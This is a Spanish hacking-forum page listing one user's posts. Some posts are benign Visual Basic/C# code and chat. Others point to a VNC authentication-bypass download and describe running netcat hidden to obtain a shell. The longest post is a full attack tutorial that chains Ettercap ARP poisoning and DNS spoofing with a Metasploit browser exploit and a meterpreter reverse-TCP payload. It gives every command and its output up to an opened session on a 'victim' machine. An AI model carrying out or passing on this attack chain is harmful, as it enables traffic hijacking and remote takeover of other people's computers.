Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Shell Root

#3571
..::| D3Bć1 |::. Creo que no leiste bien... :·P. Pero lo que dices es así:
ListView1.ListItems.Add()

Lo que dice, es si se puede modificar o agregar más contenigo a los items que ya estan dentro del Objeto ListView1
#3572
Supongo que SÍ, dandole el Numero de Columna e Numero de Item

O si no, prueba esto... :·P http://www.solovb.net/index.php/2009/02/19/modificar-datos-de-un-listview/
#3573
Emmm!

http://www.code-magazine.com/article.aspx?quickid=0803041&page=5

Ejemplo de Drag-Drop
VB:
Código (vbnet) [Seleccionar]
   Private Sub lstFile_DragDrop(ByVal sender As Object, ByVal e As System.Windows.Forms.DragEventArgs) Handles lstFile.DragDrop
       Try
           ' Obtener un array de Strings con los archivos que se están colocando
           Dim Rutas As String() = DirectCast(e.Data.GetData(DataFormats.FileDrop), String())

           ' Recorrer el array
           For Each ruta As String In Rutas
               ' obtiene la extensión del path
               Dim extension As String = Path.GetExtension(ruta).ToLower

               ' si no es un direcotorio lo agrega a la lista
               If extension.Length > 0 Then
                   lstFile.Items.Add(ruta)
               End If
           Next
       Catch ex As Exception
           MsgBox(ex.ToString)
       End Try
   End Sub

   Private Sub lstFile_DragEnter(ByVal sender As Object, ByVal e As System.Windows.Forms.DragEventArgs) Handles lstFile.DragEnter
       e.Effect = DragDropEffects.Copy
   End Sub


C#:
Código (csharp) [Seleccionar]
private void lstFile_DragDrop(object sender, System.Windows.Forms.DragEventArgs e)
{
    try {
        // Obtener un array de Strings con los archivos que se están colocando
        string[] Rutas = (string[])e.Data.GetData(DataFormats.FileDrop);
       
        // Recorrer el array
        foreach (string ruta in Rutas) {
            // obtiene la extensión del path
            string extension = Path.GetExtension(ruta).ToLower;
           
            // si no es un direcotorio lo agrega a la lista
            if (extension.Length > 0) {
                lstFile.Items.Add(ruta);
            }
        }
    }
    catch (Exception ex) {
        Interaction.MsgBox(ex.ToString);
    }
}

private void lstFile_DragEnter(object sender, System.Windows.Forms.DragEventArgs e){
    e.Effect = DragDropEffects.Copy;
}


Saludos!
#3574
Hacking / Re: [Metasploit] Karmetasploit
11 Enero 2010, 18:52 PM
Emmm! Perdon pero el tuto no es mio, es de trashhgoo, y aun no lo he probado, asi que no puedo ayudarté, pero seguro que mi amigo trashhgoo SÍ.
#3575
Hacking / Re: Conseguir Shell con Netcat
10 Enero 2010, 17:08 PM
PD: Intenta jugar con los parametros del NetCat.
Por Ejemplo:
-d Significa que desvincula a netcat del cmd y lo hace trabajar en modo oculto.
#3576
Hacking / Re: Conseguir Shell con Netcat
10 Enero 2010, 16:53 PM
Puede que no lo haya copiado y que verdaderamente lo hizo él, solo que se han visto demaciados tutoriales hablando de estó, donde toda la info es casi la misma. Asi que no te sulfures que esta diciendo la verdad... Pero buen aporté... :·P


Cita de: Pyr0s en 10 Enero 2010, 16:38 PM
  • Lo de la IP es la IP de "mi" ordenador, y si una vez que la victima acciona el script claro que me conecto a su IP local sino como quieres que me conecte a su ordenador?
Con la IP Publica... :·P

Cita de: Pyr0s en 10 Enero 2010, 16:38 PMcreo que en la inversa se puede hacer un No-IP también pero preferí poner la IP
Re-WTF! No-IP!
#3577
Hacking / Re: [Urgente] VNC bypass & IP Gmail
10 Enero 2010, 16:48 PM
1. Si usas BackTrack lo podes encontrar en scanners/vnc/, si no intenta descargalo de alguna Web. vease (www.plunder.com/VNC-bypauth-download-176.htm)
2. Lo de Hotmail vease www.plunder.com/hotmail_IP.html
#3578
Foro Libre / Re: ¿Que estas escuchando?
10 Enero 2010, 08:10 AM
Red Red Wine

[youtube=425,350]YrwFkByhlJo[/youtube]
#3579
Cita de: nico56 en 10 Enero 2010, 06:13 AM
Que es el api del messenger? El unico api que conozco es el de windows :S
:S

Una interfaz de programación de aplicaciones o API (del inglés application programming interface) es el conjunto de funciones y procedimientos (o métodos, en la programación orientada a objetos) que ofrece cierta biblioteca para ser utilizado por otro software como una capa de abstracción.

Fuente: http://es.wikipedia.org/wiki/Interfaz_de_programaci%C3%B3n_de_aplicaciones
#3580
[Ettercap + Metasploit] Suplantación de identidad por nombre de dominio [Spoofing]
[Metasploit By: Shell Root]



Miremos que tal hacen un Duo Ettercap y Metasploit (Un Duo Letal... xD). Miremos como hacer una suplantación de nombre de dominio, para la ejecución inconciente de una URL infectada con un exploit del Metasploit, devolviendo una session del Meterpreter.

Primero instalemos el Ettercap: Esta herramienta esta dentro de los repositorios
shell@ShellRoot:~$ sudo apt-get install ettercap

Ahora entremos entraremos a la siguiente ruta /usr/share/ettercap/, donde se encuentra el archivo etter.dns. (En este archivo, incluiremos unas lineas). Lo abrimos así:
shell@ShellRoot:~$ sudo gedit /usr/share/ettercap/etter.dns
[sudo] password for shell: *******


Buscamos la siguiente linea:
################################
# microsoft sucks ;)
# redirect it to www.linux.org
#


Y le agregamos:
* A 192.168.0.3:8080
Nota: El * para que cuando entre a cualquier URL se redireccione a la URL Infectada. Podemos poner el Host que deseemos si no quieren poner el *. : P

Ahora entramos el Metasploit y seleccionamos el exploit windows/browser/ani_loadimage_chunksize o windows/browser/ms09_002_memory_corruption

shell@ShellRoot:~/msf3$ ./msfconsole

                                 _            
                                | |      o    
_  _  _    _ _|_  __,   ,    _  | |  __    _|_
/ |/ |/ |  |/  |  /  |  / \_|/ \_|/  /  \_|  |  
 |  |  |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
                          /|                  
                          \|                  


      =[ metasploit v3.3.3-release [core:3.3 api:1.0]
+ -- --=[ 481 exploits - 220 auxiliary
+ -- --=[ 192 payloads - 22 encoders - 8 nops

msf > use windows/browser/ani_loadimage_chunksize
msf exploit(ani_loadimage_chunksize) >


Modificamos el parametro URIPATH para que no nos saque un Ramdom sino un Slash
msf exploit(ani_loadimage_chunksize) > set URIPATH /
URIPATH => /


Ahora seleccionamos el PAYLOAD, en este caso windows/meterpreter/reverse_tcp
msf exploit(ani_loadimage_chunksize) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp


Ingresamos el parametro LHOST
msf exploit(ani_loadimage_chunksize) > set LHOST 192.168.0.3
LHOST => 192.168.0.3


Miramos que todo esque bien y ejecutamos el exploit
msf exploit(ani_loadimage_chunksize) > show options

Module options:

  Name        Current Setting  Required  Description
  ----        ---------------  --------  -----------
  SRVHOST     0.0.0.0          yes       The local host to listen on.
  SRVPORT     8080             yes       The local port to listen on.
  SSL         false            no        Negotiate SSL for incoming connections
  SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
  URIPATH     /                no        The URI to use for this exploit (default is random)


Payload options (windows/meterpreter/reverse_tcp):

  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  EXITFUNC  process          yes       Exit technique: seh, thread, process
  LHOST     192.168.0.3      yes       The local address
  LPORT     4444             yes       The local port


Exploit target:

  Id  Name
  --  ----
  0   (Automatic) IE6, IE7 and Firefox on Windows NT, 2000, XP, 2003 and Vista


msf exploit(ani_loadimage_chunksize) > exploit
[*] Started reverse handler on port 4444
[*] Using URL: http://0.0.0.0:8080/
[*]  Local IP: http://192.168.0.3:8080/
[*] Server started.


Ahora entramos a la shell e iniciamos el sniffer del ettercap
shell@ShellRoot:~$ sudo ettercap -T -q -i eth0 -P dns_spoof -M arp:remote /192.168.0.5/ //

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Listening on eth0... (Ethernet)

 eth0 -> 00:0C:29:AE:81:42       192.168.0.5     255.255.255.0

SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 65534 GID 65534...

etter.dns:41 Invalid ip address
 28 plugins
 39 protocol dissectors
 53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services

Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %

3 hosts added to the hosts list...

ARP poisoning victims:


GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing...


Text only Interface activated...
Hit 'h' for inline help

Activating dns_spoof plugin...

Nota: Dejamos esta ventana quieta y esperemos a que la Victima inicie cualquier pagina web.

Waiting... Despues de esperar unos 3 Min... : P, miramos que hemos conseguido una session del Meterpreter... :O
msf exploit(ani_loadimage_chunksize) >
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending HTML page to 192.168.0.5:1130...
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending Windows ANI LoadAniIcon() Chunk Size Stack Overflow (HTTP) to 192.168.0.5:1130...
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.0.3:4444 -> 192.168.0.5:1131)


Ahora solo bastara con mirar las Sesiones con el comando sessions -l y para selecciona una sesion con el comando sessions -i Numero_Session. Asi:
msf exploit(ani_loadimage_chunksize) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > ipconfig

MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address  : 127.0.0.1
Netmask     : 255.0.0.0



Adaptador Ethernet PCI AMD PCNET Family - Minipuerto del administrador de paquetes
Hardware MAC: 00:0c:29:8f:90:c4
IP Address  : 192.168.0.5
Netmask     : 255.255.255.0


meterpreter >


Con esto damos por concluido el tutorial y ver el poder que tienen estas dos herramientas, si se usan conjuntamente. Esto es lo basico, esperen el resto... ;·)

By: Shell Root
Fuente: http://shellrootsecurity.blogspot.com/2010/01/ettercap-metasploit-suplantacion-de.html
Video: Nothing...